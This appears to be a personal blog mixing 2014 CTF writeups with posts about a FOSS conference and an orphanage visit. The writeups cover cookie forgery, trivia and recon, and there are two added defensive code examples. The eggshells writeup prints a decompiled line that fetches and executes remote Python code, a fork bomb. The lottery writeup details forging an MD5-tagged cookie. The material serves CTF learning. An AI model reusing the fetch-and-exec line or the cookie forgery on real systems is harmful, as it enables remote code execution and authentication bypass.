LOTTERY ASIS-CTF-2014 Web-100 writeup

Screenshot from 2014-10-23 18:28:07

This question is a basic web challenge. If we go to the link given above, we get a message like this when we visit the page for the first time 🙂

Screenshot from 2014-10-23 21:06:49

As the page says, let’s visit the page a second time 🙂

Screenshot from 2014-10-23 21:11:10

So here comes the lottery, which says that we are the 2444th visitor and that we need to become the 1234567890th visitor to win the lottery, along with a clue telling us not to hack cookies. We should always be doing the thing that we are not supposed to do, so let’s try hacking the cookies. But the first thing we need to do when we see a web question is to view the source of the given page 🙂 When you look at the page source, though, you will understand that there is no other way to find the visitor number except the cookie 🙂

If you are not aware of what a cookie is, read about it at http://en.wikipedia.org/wiki/HTTP_cookie

I have a cool tool called “Edit This Cookie” for editing cookies; you can get it from the Chrome store at https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en

If you look at the cookie named Visitor, you will see a value like this, which is URL encoded:

MjQ1Njo3Y2Y2NDM3OWViNmYyOWE0ZDI1YzRiNmEyZGY3MTNlNA%3D%3D

For more details, visit the wiki page on URL encoding: http://en.wikipedia.org/wiki/Percent-encoding

If you wonder why we should use URL encoding, this link will give you the answer: http://stackoverflow.com/questions/4667942/why-should-i-use-urlencode

You can decode it using any tool; I use this online tool: http://www.url-encode-decode.com/

The decoded result looks like this:

MjQ1Njo3Y2Y2NDM3OWViNmYyOWE0ZDI1YzRiNmEyZGY3MTNlNA==

which in turn looks like base64 encoding. If you decode it, the output looks like this:

2456:7cf64379eb6f29a4d25c4b6a2df713e4

2456 seems to be our visitor number, so if we could change the number to 1234567890 we could win the lottery (get the flag 😀 )
The value after 2456 is nothing but the md5sum of the number 2456 🙂

so

1234567890:e807f1fcf82d132f9bb018ca6738a19f

is the value we need for the cookie. Encoded as base64, it becomes

MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg==

and finally we need to URL-encode it, which gives

MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg%3D%3D

So if you submit the cookie and refresh the page, you get the flag:

ASIS_9f1af649f25108144fc38a01f8767c0c

Here is the screenshot of the flag 🙂

Screenshot from 2014-10-24 19:13:47
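
The cookie check described in this writeup fails because the tag is a plain MD5 of the number, which anyone can recompute. The following is an added example, not code from the challenge: it parses the Visitor cookie format shown above and compares the MD5 check with an HMAC keyed by a server-side secret. The function names and `SERVER_KEY` are assumptions made for the illustration.

```python
import base64
import binascii
import hashlib
import hmac
from urllib.parse import quote, unquote

SERVER_KEY = b"constructed-demo-key"  # assumption: secret known only to the server


def decode_visitor(cookie):
    """URL-decode, base64-decode and split a Visitor cookie into (count, tag)."""
    raw = base64.b64decode(unquote(cookie), validate=True).decode("ascii")
    count, _, tag = raw.partition(":")
    return count, tag


def encode_visitor(count, tag):
    """Inverse of decode_visitor: join, base64-encode, then URL-encode."""
    raw = f"{count}:{tag}".encode("ascii")
    return quote(base64.b64encode(raw).decode("ascii"), safe="")


def md5_tag(count):
    # Scheme described in the writeup: plain MD5 of the number, no secret involved.
    return hashlib.md5(count.encode("ascii")).hexdigest()


def hmac_tag(count, key=SERVER_KEY):
    # Hardened form: the tag depends on a key the client never sees.
    return hmac.new(key, count.encode("ascii"), hashlib.sha256).hexdigest()


def verify(cookie, tag_fn):
    """Return the visitor count if the tag checks out, otherwise None."""
    try:
        count, tag = decode_visitor(cookie)
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not count.isdigit():
        return None
    return int(count) if hmac.compare_digest(tag_fn(count), tag) else None


if __name__ == "__main__":
    client_made = encode_visitor("1234567890", md5_tag("1234567890"))
    print("MD5 check accepts client-made cookie: ", verify(client_made, md5_tag))
    print("HMAC check accepts client-made cookie:", verify(client_made, hmac_tag))
    issued = encode_visitor("2456", hmac_tag("2456"))
    print("HMAC check accepts issued cookie:     ", verify(issued, hmac_tag))
```

With the keyed tag, a cookie whose number was changed on the client no longer verifies; keeping the counter on the server and not in the cookie removes the problem altogether.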

HOW MUCH EXACTLY? ASIS-2014 Trivia-25 writeup

Screenshot from 2014-10-23 18:27:19

This is a very easy question, as Google was enough to get the key 🙂

If you google the description you will get the following link https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt

If you search the page (Ctrl+F to find) for “how much”, you will see that all the references are taken from this link http://www.sims.berkelev.edu/research/proiects/how-much-%20info-2003/execsum.htm#summary

Unfortunately this web page is no longer available; if you google for it you will get a link on www2: http://www2.sims.berkeley.edu/research/projects/how-much-info-2003/execsum.htm

If you search for IM (instant messaging), you find that its size is 274 Terabytes

Screenshot from 2014-10-23 18:47:42

The format of the flag is ASIS_md5(size), which means that we need to find the md5sum of the size and prepend “ASIS_” to it, which results in the flag below. We can find the md5sum of any value in the terminal using the following command

echo -n 274 | md5sum

The -n flag tells echo not to print the trailing newline. By default echo adds a newline (“\n”) at the end of 274, which changes the md5sum, so we should not forget it 🙂

ASIS_d947bf06a885db0d477d707121934ff8

But later I found that the size of instant messaging was given directly in the link https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt

I should have searched for instant messaging in the text file directly, which I later learned from another write-up

Screenshot from 2014-10-23 18:48:21

T_1000 ECTF Recon-120 writeup

Screenshot from 2014-10-23 16:23:30

This is the toughest recon that I have ever seen (or in other words the worst one :P)

The first result that you find when you search for T_1000 is the Terminator, so I tried all the names related to the movie, such as the director, the producer and the actor who played the T_1000, but with no result 🙁 I also tried Skynet, which is considered to make the Terminator in the film 😛 My teammate was kidding, saying to enter the flag as Rajinikanth 😀

After asking the admins about the challenge, I concluded that T_1000 was not related to movies 🙂

My teammate solved forensics-500, which relates to the channel #nitk-maliciousbots, which contains the bot named T_1000, so I thought this was the end of the recon and tried to get the flag by asking the bot in a private message, but this was only half of the challenge 🙂

Again, from the clue “whois T_1000”, the output of the whois command in IRC is as follows

@31337_h4X0R (cinch@2a01:7e00::f03c:91ff:fe56:df09)

BOT_T_1000 is connected via holmes.freenode.net (London, UK)

Operator in:

#nitk-maliciousbots

So we got a new thing to google for 🙂 i.e. 31337_h4X0R. It seems that 31337_h4X0R has a Twitter account; here is the account: https://twitter.com/31337_h4X0R

This account has very few tweets, and it contains this photo

shellshock

And finally, if you grep the strings in the photo, you get the flag as follows

Screenshot from 2014-10-23 18:14:40

flag{I_am_N0t_Ge0Hot}

Eight Cats Hid The Flag ECTF 2014 Recon 100 writeup

Screenshot from 2014-10-23 16:23:48

From the question and the clue given, we can surely say that the flag is in one of the admins’ GitHub repositories.

First I had the idea of downloading all the files and grepping them for the flag (this method did not work because the flag was deleted, so you can’t find the flag in any of the repositories)

I tried manually checking all the admins’ commits, but I didn’t succeed because the commit was very old, about a month old, and I didn’t go that deep into the commits 🙁

Here is the link to the commit in which the flag was deleted: https://github.com/karthiksenthil/Learn-Git/commit/9cd4ecad6f7c545ef5ac31622d503de811191d7b

flag{0ctocat_c4n_play_h1de_and_s33k}

Meet The Team – Ectf 2014 Recon-80

Screenshot from 2014-10-23 16:17:29

I have attached the screenshot of the Recon-80 question 🙂

The question is very simple, but getting to the team’s blog is hard because ECTF is being organised for the first time.

The ECTF organizers don’t have a good blog containing all the write-ups of challenges they have solved. It seems they created the blog just for this challenge, as it contains only one post, which makes it difficult for search engines to find that link (if any of you googled for the blog and did not get the link, don’t blame Google, as it is doing a great job)

The name of the team organising the CTF is NIA (no internet access). They mentioned it in the clue too, but you would never get to know that it is the name of the team. For more details visit this link: http://nia-ctf.github.io/

Bingo, you get the blog link on ctftime.org at this address https://ctftime.org/team/8096, where the link is given as http://nia-ctf.github.io/, so you have the flag. There was some small confusion regarding the format of the flag, but the admin would have helped you at that time 🙂

flag:http://nia-ctf.github.io/

Debutsav 2014 – My experience

I was well aware, through our internal mailing list, that a MiniDebConf would be conducted in our college. It was also mentioned that the name was changed from MiniDebConf to Debutsav, as this conference was not only about Debian but about other FOSS projects in general; here is the website http://debutsav.in/. But I got involved in the conference when our seniors were looking for volunteers at the last minute. A meeting was going on in TBI and I was working on some CTF or something related, so I too joined them, and I was given the work of accommodation for the delegates along with Surya chechi. So there was no work at that moment, but there would be plenty of work on the starting day of the conference and just before it.

We got very few rooms, and the rooms were on the 5th floor without a lift; you can understand how difficult it might be for the people who attend! Joyce and I made sure that there were mats and pillows there so that the attendees wouldn’t have any problem 🙂

But we had an internal issue on campus regarding the mess food, and the campus needed to be closed (I agree that the mess food is not tasty, but I have seen the mess food being cooked and it’s very hygienic), so our college was closed and all students were asked to leave the campus immediately! So most of the registrants couldn’t attend the conference, damn!

So on the morning of 17th October all I needed to do was show the participants their rooms, and I talked with them very well. One of them was from Amrita Coimbatore, others were here because their professor asked them, and some others were from Bangalore.

And the conference started with a keynote from Krishnakant Mane https://twitter.com/kkmane. He is an awesome guy and he inspired a lot with his speech; one thing I remember from his speech is

“We need a brain to Code not eyes”

when someone asked about his being differently-abled

KRISHNAKANT-MANE

Also Harish talked on the stage 😀

harish-navineeth-debutsav-2014

And the sessions started; a few of them were about localization by Sirish and ScrollBack by Priyanka Nag and by Praveen

There were also a few sessions taken by our seniors; one of them was about zsh by Athira Lekshmi chechi, and she told me that my article https://dhanvi1.wordpress.com/2015/02/14/zsh-the-ultimate-alternative-to-bash/ was very helpful to her 🙂 and I felt very happy 😀 . I couldn’t attend everything, as I was showing people who were late to the conference their rooms. I also got a cool T-shirt of the event!

There was also a hands-on workshop at night about installing Diaspora. I didn’t stay much longer, as I was feeling tired and had a headache, but the hackathon went well, and I found out later that Akshay got the thing working and got the T-shirt; I should have tried too.

The next day the conference went on as well, but I didn’t attend it and continued with my work (CTFs). There was more hands-on at night, and it ended with Bujiji giving the speakers Amma’s books and a group photo, and I was missing from it as usual!

debutsav-2014-group-photo

After the conference ended, Bithin etta took back all the mats and returned them. I felt bad, as it was my work to do and he did it on his own; I wish he had called me, then I would have done my job for sure! Anyway, thanks etta.

 

Other blogs and photos:

http://www.j4v4m4n.in/2014/10/23/debutsav-14-at-amrita-a-rewarding-experience/

https://flossexperiences.wordpress.com/2014/10/28/debutsav-2014-experiences-day-1/#more-2724

http://balasankarc.in/tech/?p=576

http://priyankaivy.blogspot.in/2014/10/debutsav14-at-gods-own-country.html

https://harishnavnit.wordpress.com/2014/10/12/debutsav-14-behind-the-scenes/

https://framasphere.org/posts/94192

https://www.facebook.com/events/1470726469873860/

https://twitter.com/hashtag/debutsav

https://poddery.com/posts/1407655

https://www.facebook.com/allamsetty.anup/posts/782159758515612

CSAW CTF Quals 2014 – eggshells (100) writeup

Here is the link to the zip file and the question: http://shell-storm.org/repo/CTF/CSAW-2014/Reverse_Engineering/eggshells-100/

The question is :

I trust people on the internet all the time, do you?

Written by ColdHeat

The question doesn’t give you any kind of hint when you first try to solve it, but when you finally see the result it makes some sense 🙂

First, when you unzip the file you get two directories named “eggshells-master” and “__MACOSX”; here are the screenshots of both directories.

Screenshot from 2014-10-07 19:09:00

Screenshot from 2014-10-07 20:50:32

The source code is there for all the files except utilys.pyc, which is a compiled Python file. You can decompile it using this application (https://sourceforge.net/projects/easypythondecompiler/ ), which is based on uncompyle2 (https://github.com/Mysterie/uncompyle2), or whatever else can decompile a Python 2.7 file 🙂

If you decompile the file, here is the code that you get:

[code language="python"]
exec __import__('urllib2').urlopen('http://kchung.co/lol.py').read()
[/code]

Don’t be in a hurry to just run the code, as it is a fork bomb 🙂

Screenshot from 2014-10-07 21:50:31

here you get the flag : flag{trust_is_risky}

Now you get why the question is like that 🙂
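
A way to look at decompiled code like the line above without executing it, given as an added example that is not part of the original challenge or writeup: it only lexes the source (so Python 2 syntax such as the `exec` statement is fine) and reports dynamic-execution names, modules passed to `__import__` and URL string literals. The `triage` and `fetches_and_runs` names are assumptions for this sketch.

```python
import ast
import io
import tokenize

# The decompiled line from the writeup, kept as data and never executed.
SAMPLE = "exec __import__('urllib2').urlopen('http://kchung.co/lol.py').read()\n"

DYNAMIC = {"exec", "eval", "execfile", "compile", "__import__"}


def triage(source):
    """Lex source text and report what deserves a closer look before running it."""
    report = {"dynamic": [], "modules": [], "urls": []}
    wanted = (tokenize.NAME, tokenize.OP, tokenize.STRING)
    toks = [t for t in tokenize.generate_tokens(io.StringIO(source).readline)
            if t.type in wanted]
    for i, tok in enumerate(toks):
        if tok.type == tokenize.NAME and tok.string in DYNAMIC:
            report["dynamic"].append(tok.string)
        if tok.type != tokenize.STRING:
            continue
        try:
            value = ast.literal_eval(tok.string)  # parses the literal only
        except (ValueError, SyntaxError):
            continue
        if isinstance(value, bytes):
            value = value.decode("latin-1")
        if "://" in value:
            report["urls"].append(value)
        # A string that is the first argument of __import__(...) names a module.
        if i >= 2 and toks[i - 1].string == "(" and toks[i - 2].string == "__import__":
            report["modules"].append(value)
    return report


def fetches_and_runs(report):
    """True when a URL literal appears alongside exec/eval/execfile."""
    runs = any(name in report["dynamic"] for name in ("exec", "eval", "execfile"))
    return runs and bool(report["urls"])


if __name__ == "__main__":
    result = triage(SAMPLE)
    print(result)
    print("remote code execution pattern:", fetches_and_runs(result))
```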

After a long time :)

I am blogging on this domain after a long time. I will now start writing all my writeups on this domain, except for picoCTF, which is hosted at http://picoctf.wordpress.com/ . I would also like to share my personal views on this domain, like the FOSSMeet post, which was my first blog 🙂 .

In this period I was getting trained in security (hacking) and also started a new blog especially for picoCTF; you can increase the stats of the blog at http://picoctf.wordpress.com/ . Also, I will stop writing silly posts such as the Gmail hack and the browser one, which can easily be found with a simple Google search.

That’s enough chit-chat; let me get to my business (blogging).

Paripilly orphanage Visit – My experience

I came to know about this one, as usual, from the mailing list. It was being planned by Sreedevi chechi, and there was also a reply to the email from Sakshi Bansal chechi saying that it was a very good experience. But I wasn’t much interested, because I thought it wasn’t technical and that I would rather spend my time working in the lab! I changed my decision when Sreedevi chechi came to our class, asked me if I was coming, asked about other people from the TBI, and told me to come, saying that it would be good. So I changed my decision and thought of attending it!

After having breakfast on the day, I was waiting for the bus to arrive along with my friends and all the seniors, and they brought a football and other items to play with the kids. I was with Sairam and Rakesh, and to make my day worse I had done a clean shave, which made me look a little awkward. The bus came and it looked like a good one, not like the one we got for FOSSMeet 😛 and we all danced in the bus too!

After reaching there we had some cultural activities, and it looked like everyone liked them. The warden was very strict, but Vipin sir told me that he also likes the kids and enjoys being with them 🙂 Here are the pics

Everyone was talking well with the kids and mingled with them very easily, even me! A few of them found me funny because I was looking like a comedian in some Tamil movie, but they didn’t tease me too much! More pics

You can tell how much our seniors really enjoyed it from this pic 😀

DSC_0452

Pics of Vipin sir and Mohanasundaram sir

It was food time by the time the events ended, and here comes the food 🙂 We served them, and one thing I found very good about them was that everyone waited until the last person got food, and they started eating only after praying together. Wow, what discipline, even we can’t do such a thing! More pics

And we also took a team group pic 🙂 I know I look a bit different!

DSC_0576.JPG

After the food, since the day we visited them was also Rakhi (https://en.wikipedia.org/wiki/Raksha_Bandhan), we explained to them how to create a simple rakhi using wool, and everyone was happy

Next we started playing games with them. The girls played a few simple games and we played football (yes, you heard it right, I was playing it for the first time and I made a lot of silly mistakes like touching the ball with my hand! Same with Sairam too) and high catches with a cricket ball. Here are the photos

After the games we had typical Kerala-style drums (sorry, I don’t know what you guys call them!) and everyone danced; I even tried the drums 🙂

It ended with a snacks break and we were done for the day, and we ended the day with a Group Photo Pareppally orphanage visit

And I came to know that we were able to sponsor the kids’ snacks for the day with the money we put in, and I felt very happy about it; I wish to do something more for them! Vipin sir also told me that even though they are orphans they are studying well and even learning arts, and I envy them, as I didn’t really learn anything since my childhood other than my subjects and preparing for IIT! They also need to work hard, as they need to manage their work by themselves (they even get up at 4 am daily; damn, I don’t even get up by 9 am). Even though Amma is taking good care of them, I found their conditions very bad, and they can be improved a lot! Also, the seniors were playing a hand-twist game, and I simply cracked it by doing the reverse of it and called myself an RE (Reverse Engineering) expert 😀 Even Akshay the hacker couldn’t get it 😛 and I showed him how to crack it and told him I used RE 😀

We all reached the campus by night and dropped the girls at their hostel. I was kidding with Sakshi that she didn’t tie me a rakhi, and she told me that she knows what’s going on in the class and she need not worry! Damn! Everyone thinks I am in a relationship 🙁

Anyway, the day went very well, and thanks once again to Sreedevi chechi for organizing this. I heard from the emails in the mailing list that everyone felt the same 🙂 well, that’s for sure! And I felt I made the right choice in visiting the orphanage (I learned a lot from them)

Update: I used this visit as a contributorship project; the report can be found here https://drive.google.com/folderview?id=0BxDZABox5hT2fi0tQUtHeV9qWWlhaEtncENjaHFwWHZvVWx0NTJvb210NURnWDZqTkJqVms&usp=sharing#grid